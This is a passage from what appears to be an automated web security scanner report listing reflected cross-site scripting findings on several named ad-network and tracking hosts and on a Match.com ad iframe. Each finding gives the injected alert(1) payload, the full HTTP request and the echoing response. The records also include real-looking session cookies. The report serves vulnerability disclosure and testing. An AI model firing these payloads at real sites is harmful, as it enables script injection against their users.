Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/12/2011 13:07:36&Microsoft.VisitStartDate=03/12/2011 13:05:30&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=21&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; msdn=L=1033; omniID=ue; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1300725939792:ss=1300725939792; WT_NVR_RU=0=technet|msdn:1=:2=; MS0=a61fbdf182064e0881bf77e83811b2f6

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Sat, 12 Mar 2011 01:58:04 GMT
ETag: "OVpaDN57mJiQ+1EliW6PYUb1vNI="
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 279778642100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: public, max-age=600
Expires: Tue, 22 Mar 2011 21:13:50 GMT
Date: Tue, 22 Mar 2011 21:03:50 GMT
Connection: close
Content-Length: 2103

...var BiMapping6e777;alert(1)//ed6a1ff59af={"Webtrends":{"enabled":true,"settings":{"interactiontype":{"0":true,"1":true,"2":true,"3":true,"4":true,"5":true,"6":true,"7":true,"8":true,"9":true,"10":true,"11":true,"12":true,"13":true,"14":true,
...[SNIP]...

1.203. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fcf9"-alert(1)-"2ee6f2d254e was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=38838&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D6fcf9"-alert(1)-"2ee6f2d254e HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost?t=1300831418910&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300642147_20056:0; cre=1_1300642204_20056:24801:7:0_20053:24803:11:56_20054:24802:1:456_14598:11789:1:1273600; uid=1_1300642204_1297862321306:0415785655118336; kwd=1_1300642204_11317:231018_11717:231018_11718:231018_11719:231018_11722:339653_10827:339653_10842:339657_10839:339657_10824:339857; scg=1_1300642204; ppd=1_1300642204

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:03:41 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300831421_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Sun, 20-Mar-2016 22:03:41 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 22 Mar 2011 22:03:41 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 518

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=38838&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D6fcf9"-alert(1)-"2ee6f2d254e' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

1.204. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b126c"-alert(1)-"127b8b9ce75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=38838&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D&b126c"-alert(1)-"127b8b9ce75=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost?t=1300831418910&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300642147_20056:0; cre=1_1300642204_20056:24801:7:0_20053:24803:11:56_20054:24802:1:456_14598:11789:1:1273600; uid=1_1300642204_1297862321306:0415785655118336; kwd=1_1300642204_11317:231018_11717:231018_11718:231018_11719:231018_11722:339653_10827:339653_10842:339657_10839:339657_10824:339857; scg=1_1300642204; ppd=1_1300642204

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:03:42 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300831422_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Sun, 20-Mar-2016 22:03:42 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 22 Mar 2011 22:03:42 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 521

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=38838&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D&b126c"-alert(1)-"127b8b9ce75=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

1.205. http://imp.fetchback.com/serve/fb/adtag.js [tid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f685a"-alert(1)-"d3cf7c79da6 was submitted in the tid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=38838f685a"-alert(1)-"d3cf7c79da6&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost?t=1300831418910&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300642147_20056:0; cre=1_1300642204_20056:24801:7:0_20053:24803:11:56_20054:24802:1:456_14598:11789:1:1273600; uid=1_1300642204_1297862321306:0415785655118336; kwd=1_1300642204_11317:231018_11717:231018_11718:231018_11719:231018_11722:339653_10827:339653_10842:339657_10839:339657_10824:339857; scg=1_1300642204; ppd=1_1300642204

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:03:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1300831419_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Sun, 20-Mar-2016 22:03:39 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 22 Mar 2011 22:03:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 518

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=38838f685a"-alert(1)-"d3cf7c79da6&type=mrect&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSu
...[SNIP]...

1.206. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload baa54"-alert(1)-"50e4220934d was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=38838&type=mrectbaa54"-alert(1)-"50e4220934d&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7TgZXTQqKpVuHU2l4bophah3iN8TPOcf9GeJQikv1mw6gvjuO5Lkd1NCw5vx9hdx1T%2526redirectURL%253D HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost?t=1300831418910&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; eng=1_1300642147_20056:0; cre=1_1300642204_20056:24801:7:0_20053:24803:11:56_20054:24802:1:456_14598:11789:1:1273600; uid=1_1300642204_1297862321306:0415785655118336; kwd=1_1300642204_11317:231018_11717:231018_11718:231018_11719:231018_11722:339653_10827:339653_10842:339657_10839:339657_10824:339857; scg=1_1300642204; ppd=1_1300642204

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:03:40 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300831420_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Sun, 20-Mar-2016 22:03:40 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 22 Mar 2011 22:03:40 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 518

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=38838&type=mrectbaa54"-alert(1)-"50e4220934d&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7T
...[SNIP]...

1.207. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload cf4c0<script>alert(1)</script>41644a951f0 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=H07710cf4c0<script>alert(1)</script>41644a951f0 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=1a484aca566591c53c93394519ccf266; rsiPus_0="MLsXrEEucT5zIBH3Qpx+rOCHV9wTIf62V307nImZlEBw76YpcfzcZFr0RWvrtRsL1Wr8YdprMhhJd15eFUYGqJstP2duQv8PkdiB0lhkBml9ADYHA1ooiLCxxE4ZbZ6dBJlUHDgyYQ0dWGNgk2mU/6IWZPFutmXvjkfCaZ8XNFt00xjNbdPTO5Zy3pjFEXPPiN9sqakOxmiPznF2pe+333CVmVWtapVbuhz0jSjKWdMeE2eBsBSvtYkc0fmomYLtyi+Lts1umyzd9z/SrKTmNmTnFBMFArLCfjigahHLEoWhBrWvrSf8IrxyRfMTPFuk5iOzQgPN/kcU9HlxpNtUXKVd6mKr30sFlylIwkI9VjAWygBVrOHtwrSI7YvNNUqNCBU5c3lYOKS3+UBPVKDwLi0H3JXAmFxwbNP3r+5Rck+Pdm9kW/4="; NETSEGS_K05540=3161248fde72e26b&K05540&0&4da1a7e9&0&&4d7c48a5&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_J08778=3161248fde72e26b&J08778&0&4da1a841&3&10062,10068,50003&4d7c24ae&0383df689f9c2c8ede3ba30f48f38e86; rsi_segs_1000000=...[SNIP]...; rtc_5xfh=...[SNIP]...; NETSEGS_J08781=3161248fde72e26b&J08781&0&4da8f208&0&&4d82e440&0383df689f9c2c8ede3ba30f48f38e86; udm_0=...[SNIP]...; rsi_us_1000000=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 23 Mar 2011 19:39:26 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 24 Mar 2011 19:39:26 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 23 Mar 2011 19:39:26 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "H07710CF4C0<SCRIPT>ALERT(1)</SCRIPT>41644A951F0" was not recognized.
*/

1.208. http://mbox12e.offermatica.com/m2/tmobile/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox12e.offermatica.com
Path:   /m2/tmobile/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload a616e<script>alert(1)</script>0b99d93bd33 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/tmobile/mbox/standard?mboxHost=www.t-mobile.com&mboxSession=1300833028182-172718&mboxPC=1300624507874-511379.17&mboxPage=1300833028182-172718&mboxCount=1&mbox=tmobile_globala616e<script>alert(1)</script>0b99d93bd33&mboxId=0&mboxURL=http%3A%2F%2Fwww.t-mobile.com%2Fshop%2Fphones%2F&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F12&mboxVersion=34 HTTP/1.1
Host: mbox12e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.t-mobile.com/shop/phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 136
Date: Tue, 22 Mar 2011 22:30:52 GMT
Server: Test & Target

mboxFactories.get('default').get('tmobile_globala616e<script>alert(1)</script>0b99d93bd33',0).setOffer(new mboxOfferDefault()).loaded();

1.209. http://media.match.com/iframe [@CPSC@ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /iframe

Issue detail

The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34784"><script>alert(1)</script>b0543cfa2b4 was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2121888_1083487_728x90_1226306_2121888&target=_blank&@CPSC@=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/3/0/%2a/p%3B236938802%3B0-0%3B1%3B42938746%3B3454-728/90%3B40712866/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3f34784"><script>alert(1)</script>b0543cfa2b4 HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://yahoo.match.com/search/searchSubmit.aspx?by=radius&lid=226&cl=1&gc=1&tr=2&lage=25&uage=35&ua=35&dist=20&po=1&oln=0&do=2&q=man,women,25,35&st=quicksearch&pn=1&rn=4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dMatch=CCount=1&CDate=3/22/2011; __utmz=191932533.1300827941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ppLoginReferer=http%3a%2f%2fyahoo.match.com%2fLogin%2fLinkedAccountsPassportReturn.aspx; dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; dMatchSearch=SC01=1&SC02=2&SC07=&SC08=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; __utma=191932533.1516891893.1300827941.1300827941.1300827941.1; __utmc=191932533; __utmb=191932533.10.10.1300827941

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 21:34:27 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-612909186; expires=Mon, 22 Mar 2021 09:34:27 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088050/1083487,0/0,0/0,0/0,0/0; expires=Mon, 20 Jun 2011 21:34:27 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 783
Connection: close

<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
</HEAD>
<BODY>
<A HREF="http://media.match.com/click.ng?spacedesc=2121888_1083487_728x90_1226306_2121888&af=1110302&ml_pkgkw=-%253A%25
...[SNIP]...
mp=1088050&ml_crid=2121933&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/3/0/%2a/p%3B236938802%3B0-0%3B1%3B42938746%3B3454-728/90%3B40712866/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3f34784"><script>alert(1)</script>b0543cfa2b4http://www.match.com/brands/chemistry.aspx?s=5&TrackingID=2000955&sourceid=1088050_1083487_1226306_2121888_1110302_2121933_728x90" TARGET="_blank">
...[SNIP]...

1.210. http://media.match.com/iframe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9b6"><script>alert(1)</script>5ae855d3b0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2121888_1083487_728x90_1226306_2121888&target=_blank&@CPSC@=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/3/0/%2a/p%3B236938802%3B0-0%3B1%3B42938746%3B3454-728/90%3B40712866/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3f&5c9b6"><script>alert(1)</script>5ae855d3b0a=1 HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://yahoo.match.com/search/searchSubmit.aspx?by=radius&lid=226&cl=1&gc=1&tr=2&lage=25&uage=35&ua=35&dist=20&po=1&oln=0&do=2&q=man,women,25,35&st=quicksearch&pn=1&rn=4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dMatch=CCount=1&CDate=3/22/2011; __utmz=191932533.1300827941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ppLoginReferer=http%3a%2f%2fyahoo.match.com%2fLogin%2fLinkedAccountsPassportReturn.aspx; dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; dMatchSearch=SC01=1&SC02=2&SC07=&SC08=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; __utma=191932533.1516891893.1300827941.1300827941.1300827941.1; __utmc=191932533; __utmb=191932533.10.10.1300827941

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 21:34:47 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=13-541182733; expires=Mon, 22 Mar 2021 09:34:47 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088050/1083487,0/0,0/0,0/0,0/0; expires=Mon, 20 Jun 2011 21:34:47 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 823
Connection: close

<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
</HEAD>
<BODY>
<A HREF="http://media.match.com/click.ng?spacedesc=2121888_1083487_728x90_1226306_2121888&af=1110302&ml_pkgkw=-%253A%25
...[SNIP]...
p=1088050&ml_crid=2124088&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/3/0/%2a/p%3B236938802%3B0-0%3B1%3B42938746%3B3454-728/90%3B40712866/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3f&5c9b6"><script>alert(1)</script>5ae855d3b0a=1http://www.match.com/brands/chemistry.aspx?s=5&TrackingID=2000955&sourceid=1088050_1083487_1226306_2121888_1110302_2124088_728x90" TARGET="_blank">
...[SNIP]...

1.211. http://media.match.com/iframe [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /iframe

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4837c"><script>alert(1)</script>6569d8e2df9 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2121888_1083487_728x90_1226306_2121888&target=_blank4837c"><script>alert(1)</script>6569d8e2df9&@CPSC@=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/3/0/%2a/p%3B236938802%3B0-0%3B1%3B42938746%3B3454-728/90%3B40712866/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
